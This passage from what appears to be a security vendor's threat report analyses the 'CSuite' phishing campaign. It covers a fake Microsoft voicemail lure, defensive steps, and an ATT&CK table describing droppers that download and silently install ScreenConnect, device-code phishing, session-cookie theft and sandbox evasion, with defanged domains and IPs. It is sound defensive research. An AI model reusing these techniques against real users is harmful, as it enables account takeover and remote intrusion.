<p class="wp-block-paragraph">Host documentensono[.]sbs, <strong>voicemail </strong>template. A Microsoft 365 notification says a voicemail is waiting, complete with caller, duration, a progress bar and a footer about Teams voicemail settings and asks the visitor to sign in to hear it. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="578" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-voice-mail-1024x578.jpg" alt="The example of Device Code Phishing with Microsoft Voicemail lure page" class="wp-image-23266" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-voice-mail-1024x578.jpg 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-voice-mail-300x169.jpg 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-voice-mail-768x434.jpg 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-voice-mail-370x209.jpg 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-voice-mail-270x152.jpg 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-voice-mail-740x418.jpg 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-voice-mail.jpg 1360w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The example of Device Code Phishing with Microsoft Voicemail lure page</em></figcaption></figure>
</div>


<h2 class="wp-block-heading">How Organizations Can Reduce the Risk from CSuite </h2>



<p class="wp-block-paragraph">CSuite can compromise both identities and endpoints through phishing, device-code authentication, stolen sessions, and legitimate management tools. Defending against it requires visibility across the full attack chain, from the initial lure to account and host access. </p>



<h3 class="wp-block-heading">Investigate Suspicious Lures Before They Reach Users </h3>



<p class="wp-block-paragraph">CSuite uses fake Adobe, DocuSign, Zoom, SharePoint, and Microsoft 365 pages to deliver scripts, installers, and authentication flows. Suspicious files and links should be analyzed in an isolated environment before users interact with them. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="555" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sandbox-analysis-1024x555.png" alt="CSuite attack analyzed inside ANY.RUN’s sandbox " class="wp-image-23269" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sandbox-analysis-1024x555.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sandbox-analysis-300x163.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sandbox-analysis-768x417.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sandbox-analysis-1536x833.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sandbox-analysis-2048x1111.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sandbox-analysis-370x201.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sandbox-analysis-270x146.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/CSuite-sandbox-analysis-740x401.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>CSuite attack analyzed inside ANY.RUN’s sandbox</em> </figcaption></figure>
</div>


<p class="wp-block-paragraph">ANY.RUN’s <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> can expose redirects, PowerShell execution, payload delivery, anti-analysis behavior, and remote-management installation across the full attack chain. </p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Cut MTTR by 21 mins per alert.
</span> 
<br>
Integrate ANY.RUN in your SOC or MSSP. 
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/enterprise/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktoenterprise#contact-sales" rel="noopener" target="_blank">
Contact us</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">Look Beyond the First Indicator </h3>



<p class="wp-block-paragraph">A single malicious domain or URL may be part of a much larger CSuite cluster. Recurring artifacts such as /m/js/utils.js, shared lure patterns, and related infrastructure can help analysts connect activity that would otherwise appear separate.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="613" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-1024x613.png" alt="CSuite lookup" class="wp-image-23238" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-1024x613.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-300x180.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-768x460.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-1536x919.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-370x221.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-270x162.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2-740x443.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/intelligence-lookup-2.png 1749w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Lookup displays full context into the attack for deeper investigations</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">ANY.RUN <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a> lets analysts pivot from domains, IPs, URLs, files, and recurring paths to connected infrastructure. </p>



<h3 class="wp-block-heading">Keep Detection Current as Infrastructure Changes </h3>



<p class="wp-block-paragraph">CSuite rotates domains and hosting, which limits the value of static blocklists alone. Security teams need fresh indicators that can be applied across existing controls as new infrastructure appears. </p>


<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="462" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-1024x462.png" alt="TI Feeds enriches systems with fresh and actionable IOCs" class="wp-image-23271" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-1024x462.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-300x135.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-768x346.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-1536x692.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-2048x923.png 2048w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-370x167.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-270x122.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/09/TI-feeds-1-740x334.png 740w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Feeds enriches systems with fresh and actionable IOCs</em></figcaption></figure>
</div>


<p class="wp-block-paragraph">ANY.RUN <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds </a>can deliver current malicious domains, IPs, URLs, and other IOCs into SIEM, EDR, firewalls, and other security tools. </p>



<h3 class="wp-block-heading">Correlate Identity and Endpoint Activity </h3>



<p class="wp-block-paragraph">Unexpected Microsoft 365 sessions, device-code authentication, and new management-agent installations should be investigated together. With CSuite, activity that looks like separate identity and endpoint incidents may belong to the same attack. </p>



<h3 class="wp-block-heading">Contain More Than the Password </h3>



<p class="wp-block-paragraph">If session or device-code compromise is suspected, revoke active sessions and tokens, review OAuth grants and mailbox rules, and investigate activity performed through the affected account. Unauthorized management agents should also be removed and affected endpoints checked for persistence. </p>



<h2 class="wp-block-heading">Conclusion </h2>



<p class="wp-block-paragraph">CSuite combines phishing, session theft, and remote-access delivery within a single operation, giving attackers multiple paths into both accounts and endpoints. </p>



<p class="wp-block-paragraph">For security teams, the key challenge is that these paths can appear separate while supporting the same campaign. Detection therefore needs to connect identity activity, phishing infrastructure, and unexpected use of legitimate management tools. </p>



<p class="wp-block-paragraph">The scale seen in CSuite also suggests that the activity extends beyond what any single telemetry source can capture, making early correlation and cross-layer visibility especially important. </p>



<h2 class="wp-block-heading">About ANY.RUN</h2>



<p class="wp-block-paragraph"><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener"><strong>ANY.RUN</strong></a> is a leading provider of interactive malware analysis and threat intelligence solutions trusted by <strong>16,000+ organizations and 700,000+ security professionals worldwide</strong>, including <strong>74% of the Fortune 100</strong>.</p>



<p class="wp-block-paragraph">Its <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a> and <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=csuite-attack-analysis&amp;utm_term=220926&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>Threat Intelligence</strong></a> solutions help SOC teams analyze suspicious files and URLs, uncover malicious behavior, enrich alerts with actionable context, and connect related activity across files, infrastructure, and campaigns. This helps teams investigate threats faster, make more confident response decisions, and contain malicious activity before it creates wider business impact.</p>



<h2 class="wp-block-heading">TTPs (MITRE ATT&amp;CK) </h2>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-398"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="29"
           data-wpID="398"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell "
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Technique                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        ID                     </th>
                                                <th class="wpdt-cell "
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:33.333333333333%;                    padding:10px;
                    "
                    >
                                        Description                     </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        Acquire infrastructure: domains                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        T1583.001                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used 38 lure, redirector and harvester domains                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        Acquire infrastructure: domains                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        T1583.001                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used lookalike registrations such asambitiousaboutautismorguk[.]com andsolarengyloanfunds[.]com to present credential prompts under the name of a real organisation                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        Acquire infrastructure: server                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        T1583.004                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used the shared-hosting account to host lure pages and payload archives                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        Compromise infrastructure: server                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        T1584.004                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used compromised legitimate websites among the 170 hosts in the sandbox corpus to serve the same lure kit                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        Establish accounts: cloud accounts                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        T1585.003                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used two Cloudflare accounts with connected API keys to front and automate its domains                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        Stage capabilities: upload malware                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        T1608.001                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used archives on its shared-hosting account and installers committed to a public code-hosting account to deliver payloads                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        Phishing: spearphishing link                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        T1566.002                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used the Adobe Sender module to dispatch invitations from hijacked Adobe Document Cloud tenants                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        Drive-by compromise                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        T1189                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used a synthetic click on an <a download> element to start the archive download on page load                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        User execution: malicious file                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        T1204.002                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used counterfeit installation instructions to have the victim extract and run the archived executable                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        Masquerading: match legitimate name                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        T1036.005                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used the renamed Adobe binarySSAStatement.exe to present the loader as a financial statement                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        Hijack execution flow: DLL side-loading                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        T1574.001                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        SSAStatement.exe used a substitutedmsvcp140.dll in its own directory to execute attacker code                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        Subvert trust controls: code signing                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        T1553.002                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used a valid Adobe DigiCert signature on the loader to pass signature and reputation checks                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A14"
                    data-col-index="0"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        Command and scripting interpreter: Windows command shell                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B14"
                    data-col-index="1"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        T1059.003                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C14"
                    data-col-index="2"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used batch droppers that test for administrative rights with fltmc or net session and then install the agent silently                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A15"
                    data-col-index="0"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        Command and scripting interpreter: PowerShell                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B15"
                    data-col-index="1"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        T1059.001                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C15"
                    data-col-index="2"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        The droppers used Start-Process-Verb RunAs to self-elevate and Net.WebClient.DownloadFile to fetch the agent package                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A16"
                    data-col-index="0"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        Ingress tool transfer                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B16"
                    data-col-index="1"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        T1105                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C16"
                    data-col-index="2"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        The droppers pulled agent packages from the vendor’s own cloud and from raw URLs on a public code-hosting account                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A17"
                    data-col-index="0"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        System binary proxy execution: msiexec                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B17"
                    data-col-index="1"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        T1218.007                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C17"
                    data-col-index="2"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        The newer batch dropper handed msiexec /i an HTTPS URL with /quiet /norestart, installing the ScreenConnect client without staging a file on disk                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A18"
                    data-col-index="0"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        Remote access software                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B18"
                    data-col-index="1"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        T1219                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C18"
                    data-col-index="2"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used a ScreenConnect client bound to instance-t7o41i-relay[.]screenconnect[.]com to take control of the host                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A19"
                    data-col-index="0"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        Boot or logon autostart: authentication package                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B19"
                    data-col-index="1"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        T1547.002                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C19"
                    data-col-index="2"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        ScreenConnect usedScreenConnect.WindowsAuthenticationPackage.dll appended to LSA to load at boot                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A20"
                    data-col-index="0"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        Modify authentication process                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B20"
                    data-col-index="1"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        T1556                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C20"
                    data-col-index="2"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        ScreenConnect used a registered credential provider CLSID to capture interactive logon                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A21"
                    data-col-index="0"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        Steal web session cookie                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B21"
                    data-col-index="1"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        T1539                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C21"
                    data-col-index="2"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used per-domain cookie capture modes to take over authenticated Office 365 sessions                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A22"
                    data-col-index="0"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        Multi-factor authentication request generation                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B22"
                    data-col-index="1"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        T1621                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C22"
                    data-col-index="2"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used device-code landing pages onmaillive[.]sbs to drive victims through an attacker-initiated approval                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A23"
                    data-col-index="0"
                    data-row-index="22"
                    style="                    padding:10px;
                    "
                    >
                                        Exfiltration over web service                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B23"
                    data-col-index="1"
                    data-row-index="22"
                    style="                    padding:10px;
                    "
                    >
                                        T1567                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C23"
                    data-col-index="2"
                    data-row-index="22"
                    style="                    padding:10px;
                    "
                    >
                                        The lure pages used a messaging bot API to report each visitor, called from the victim browser in the static build and from the web server in the PHP build                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A24"
                    data-col-index="0"
                    data-row-index="23"
                    style="                    padding:10px;
                    "
                    >
                                        Remote email collection                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B24"
                    data-col-index="1"
                    data-row-index="23"
                    style="                    padding:10px;
                    "
                    >
                                        T1114.002                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C24"
                    data-col-index="2"
                    data-row-index="23"
                    style="                    padding:10px;
                    "
                    >
                                        The operator used the remote-desktop host207.189.19[.]40:26688 to work inside captured mailboxes by hand                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A25"
                    data-col-index="0"
                    data-row-index="24"
                    style="                    padding:10px;
                    "
                    >
                                        Multi-hop proxy                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B25"
                    data-col-index="1"
                    data-row-index="24"
                    style="                    padding:10px;
                    "
                    >
                                        T1090.003                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C25"
                    data-col-index="2"
                    data-row-index="24"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used Cloudflare workers.dev reverse proxies to hide the origin of its lure domains                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A26"
                    data-col-index="0"
                    data-row-index="25"
                    style="                    padding:10px;
                    "
                    >
                                        Virtualisation and sandbox evasion                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B26"
                    data-col-index="1"
                    data-row-index="25"
                    style="                    padding:10px;
                    "
                    >
                                        T1497                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C26"
                    data-col-index="2"
                    data-row-index="25"
                    style="                    padding:10px;
                    "
                    >
                                        The kit used honeypot fields, automation checks, a named list of security-vendor and scanner signatures, and a resource-exhaustion loop armed on a 30-to-120-second timer to stall automated analysis                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A27"
                    data-col-index="0"
                    data-row-index="26"
                    style="                    padding:10px;
                    "
                    >
                                        Execution guardrails                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B27"
                    data-col-index="1"
                    data-row-index="26"
                    style="                    padding:10px;
                    "
                    >
                                        T1480                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C27"
                    data-col-index="2"
                    data-row-index="26"
                    style="                    padding:10px;
                    "
                    >
                                        The gate used address blocklists, two /24ranges, a fingerprint ban list and a six-country geographic filter to serve the phishing page only to visitors that passed every check                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A28"
                    data-col-index="0"
                    data-row-index="27"
                    style="                    padding:10px;
                    "
                    >
                                        Input capture: web portal capture                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B28"
                    data-col-index="1"
                    data-row-index="27"
                    style="                    padding:10px;
                    "
                    >
                                        T1056.003                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="C28"
                    data-col-index="2"
                    data-row-index="27"
                    style="                    padding:10px;
                    "
                    >
                                        CSuite used providers/chameleon.php to take the password twice and then drop the victim on their real corporate site                     </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A29"
                    data-col-index="0"
                    data-row-index="28"
                    style="                    padding:10px;
                    "
                    >
                                        Impersonation                     </td>
                                                <td class="wpdt-cell "
                                            data-cell-id="B29"
                    data-col-index="1"
                    data-row-index="28"
                    style="                    padding:10px;
                    "
                    >
                                        T1656                     </td>
